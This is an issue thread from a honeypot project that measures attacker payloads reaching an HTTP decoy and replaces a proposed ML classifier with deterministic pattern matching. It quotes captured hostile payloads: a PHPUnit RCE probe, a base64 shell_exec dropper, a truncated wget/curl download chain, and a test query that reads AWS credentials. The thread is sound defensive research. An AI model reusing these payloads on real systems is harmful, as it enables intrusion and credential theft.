### ISSUE TITLE
Classify HTTP payload text (body/query), not the bait path — the ~9.5k events/week nothing looks at

### ISSUE THREAD

**Issue by Xore** [Xore/APIARY#1809]
## The gap, stated precisely

Found while researching #1793 (closed: a DistilBERT classifier over request paths
would only reproduce `classify()`, which the sensor already computes
deterministically).

**The bait path tells us what was probed. It tells us nothing about what was
sent.** `arcane/home/honeypot-http/http-honeypot/main.go:290` sets
`Category: classify(r.URL.Path)` — so a POST carrying an SQLi payload to a
WordPress bait path is categorised `wordpress`, identically to a benign scan of
the same path. The payload is recorded (`honeypot.body`, `honeypot.query`) and
then nothing classifies it.

## Volume — measured, not assumed

`honeypot-v2-*`, `event.sensor: http-honeypot`, last 7 days (~176 k events):

- **`honeypot.body` present: 7,959**
- **`honeypot.query` present: 1,551**

So roughly **9.5 k events per week carry attacker-authored payload text** that no
component currently classifies. That is a real, bounded corpus of genuinely
adversarial input — and unlike the path (which is a lookup), it is a true
text-classification problem: SQLi, XSS, path traversal, template/expression
injection, deserialization, command injection, or benign.

Volume also matters the other way: 9.5 k/week is far too much to send through the
LLM path per event, and small enough that a compact encoder could run **inline on
every one** rather than on a sample.

## The blocker, and it is the whole issue

**There are no labels.** The research phase has to answer where they come from
before any model is chosen:

1. **Suricata alerts on the same requests** — the obvious candidate. Suricata runs
   at the VPS edge; if its alerts can be joined to the honeypot event for the same
   request (Community ID, added in #1774, is the plausible join key — *verify it is
   actually populated on both sides* before building on it), its signature classes
   seed a label set. Caveat: this teaches a model to imitate Suricata, so it only
   pays off if the model generalises past the signatures — measure that, do not
   assume it.
2. **Public web-attack corpora** (CSIC 2010, PayloadAllTheThings-style sets) —
   available, but a domain-shift argument is required: lab payloads versus what
   actually reaches an internet-exposed decoy.
3. **Hand-labelling a sample** — 9.5 k/week means a few hundred labelled examples
   is a realistic afternoon, and per #1793's third source (DistilXIDS) the
   class-imbalance handling matters more than the model.
4. **The LLM worker's own verdicts** — cheap but circular; if used, it is
   distillation of the LLM path, and must be described as such rather than as
   ground truth.

If none of these yields a defensible label set, the honest outcome is "this stays
an LLM-path job" — a complete result for this issue.

## Why a small encoder is the right shape *if* labels exist

Established in #1793's research: DistilXIDS (*Neurocomputing* 668, 2025) reports
real deployment profiling — latency, throughput, GPU utilisation, batch-size
scaling — for a DistilBERT-class IDS, and SecureBERT 2.0 NER (#1804) shows a
**0.1 B** encoder hitting F1 0.945 on security text. Either size runs inline
without contending with the Ollama slots for the 20 GB card. This is the same
"small encoder instead of an LLM call" thesis as #1804's candidate 3, and if both
proceed they should share an evaluation approach.

## Evaluation must not repeat the mistakes we already found

- **No point-adjusted or leakage-prone splits** — split by `src_ip` and by time,
  build features after the partition (#1794, #1792).
- **AUPRC, not accuracy** — the interesting classes will be rare here too, exactly
  as they were in #1793's category distribution (`rce-probe`: 45/week).
- **Report what it finds that the LLM path missed, and vice versa** — per #1805,
  the value is in the differential, not in a single score.
- **Save the full transcripts** — inputs and predictions per event, per run
  (#1805). These are real captured payloads, so transcripts stay **outside the
  repo** with only hashes and pointers in the issue.

## Acceptance

- A recorded decision on the label source, with the Community ID join verified on
  real documents if Suricata is chosen.
- If labels are viable: an offline evaluation on real captured payloads, AUPRC
  headline, differential against the LLM path.
- If not: "stays an LLM-path job", with the reasoning recorded so it is not
  reopened from the same observation.

Related: #1793 (closed, where this was found), #1804 (SecureBERT 2.0 NER, same
thesis), #1805 (scoring and transcript rules), #1774 (Community ID).

**Comment by Xore** [comment]
Researched the blocker. Two findings, and together they say this should not be a model.

## The Suricata label source is not available

The issue names Community ID as the plausible join key and says to verify it is populated on both sides before building on it. Verified:

- `http-honeypot` events carrying `network.community_id`, last 7 days: **0 of 174,384.**
- And it is not merely missing, it is not computable. Community ID v1 needs (src_ip, src_port, dst_ip, dst_port, proto). A sampled event's `honeypot.*` keys are: `asset_id, body, canonical_attck_techniques, canonical_fingerprint, canonical_fingerprint_kind, category, headers, host, method, organization, path, persona_id, sensor, site_id, src_ip, status, tarpit_bytes, tarpit_ms, tarpitted, time, user_agent`. There is no source port and no destination at all — `network` and `destination` are both `{}`.

So that join needs a sensor change (logging the ports) before it needs a model. Suricata's side is fine — 1,367 alerts in 24h carry `http.url`, `http_method` and `source.ip` — but the honeypot side has nothing to join on.

## The corpus is closed, and small

This is the finding that matters. Distinct payload texts, measured with a cardinality aggregation over the same field the events actually carry:

| window | events with a body | distinct bodies |
|---|---|---|
| 7 days | 8,072 | **339** |
| 30 days | 8,695 | **358** |

Four times the window yields nineteen more distinct payloads, a 5.6% increase. And `honeypot.query`: 528 events over 30 days, **4 distinct values**.

The distribution is extremely long-tailed. The single most common body is 2,442 of 8,072 events — 30% on its own — and the top ten cover 39%:

```
2442  <?php echo(md5("Hello PHPUnit"));
 317  <?php shell_exec(base64_decode("Y2QgL3RtcCB8fCBjZCAvdmFyL3RtcCB8fCBjZCAvZGV2L3NobTsg…
 116  {"requests":[]}
  57  {"Name": "lan test", "Description": "lan test", "Enabled": true, "Password": …
  51  (wget --no-check-certificate -qO- https://…/sh || curl -sk https://…
  42  <?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:env="http://www.w3.org/2003/05…
  38  \x00\x00\x00\x00\x03:\x01*
```

These are named, recognisable things — CVE-2017-9841's PHPUnit probe, a base64 shell dropper, a SOAP envelope, a binary protocol handshake.

## What follows

The issue's framing — "a true text-classification problem", "small enough that a compact encoder could run inline on every one" — does not survive the measurement. 358 distinct strings a month is not a text-classification problem. It is a lookup table with a handful of patterns behind it, and the labelling blocker dissolves with it: 358 payloads can be labelled exhaustively by hand in an afternoon, which is less work than assembling a training set and far less than validating a model that generalises past Suricata's signatures.

Concretely, the cheaper path that gets the same outcome:

1. Extend the deterministic classifier the sensor already has. `classify()` reads the path today; the same function can read body and query. Roughly fifteen patterns — PHP tag, base64 `shell_exec`, `wget|curl` chain, SQL keywords in a value, `../` traversal, template-expression syntax, serialised-object markers, SOAP envelope — would cover the large majority of that 39% head and most of the tail's shape.
2. Emit the payload class as its own field, separate from the path-derived `category`, so the POST-with-an-SQLi-payload-to-a-WordPress-path case the issue opens with is visible as both things at once rather than one overwriting the other.
3. Keep the distinct-body count under watch. If it ever stops plateauing — if a month starts yielding thousands of new distinct payloads rather than nineteen — that is the signal that the corpus became open and the model argument becomes real. It is not real today.

Not proposing to close this: the gap the issue describes is real and worth fixing. Only the method changes, and it gets considerably cheaper.

**Comment by Xore** [comment]
Decided and implemented — closing on the acceptance criterion that mattered: *a recorded decision on the label source, with the reasoning recorded so it is not reopened from the same observation.*

**The decision: patterns, not a model.** The research comment above measured the corpus rather than assuming it. Over 30 days the fleet saw 11,139 requests carrying a body or query and 583 distinct values between them — and that count is itself inflated, because ~19 events each of an identical multipart probe differ only by their random WebKitFormBoundary. One payload, CVE-2017-9841's PHPUnit probe, is a quarter of the corpus alone. That is a lookup table, not a text-classification problem, and the labelling blocker dissolves with it.

**Implemented in #1888, landed in #1910.** `classifyPayload()` reads query and body and emits `payload_class` as its own field, separate from the path-derived `category` — so the case this issue opens with, an SQL injection POSTed to a WordPress bait path, reads as both things instead of one overwriting the other.

**92.5% of the window is named.** What is left is scanner cache-busting like `v=GyJrG` and `id=3`, deliberately unlabelled: a classifier that fires on ordinary traffic makes every event look interesting.

Verified live after deploy, on a request through the sensor:

```
query=cmd=cat%20/root/.aws/credentials
category='scan'   payload_class='command-injection'
```

**When to reopen:** the guard is in the code comment — if a month ever starts yielding thousands of genuinely new distinct payloads instead of a handful, the corpus has become open and the model argument becomes real. It is not real today.

The tail also turned up classes nobody had named, now covered: Model Context Protocol handshakes from scanners hunting exposed MCP servers, mining RPC probes, Cisco AnyConnect handshakes at a web port, and requests whose entire query is a bare hostname (open-resolver tests).
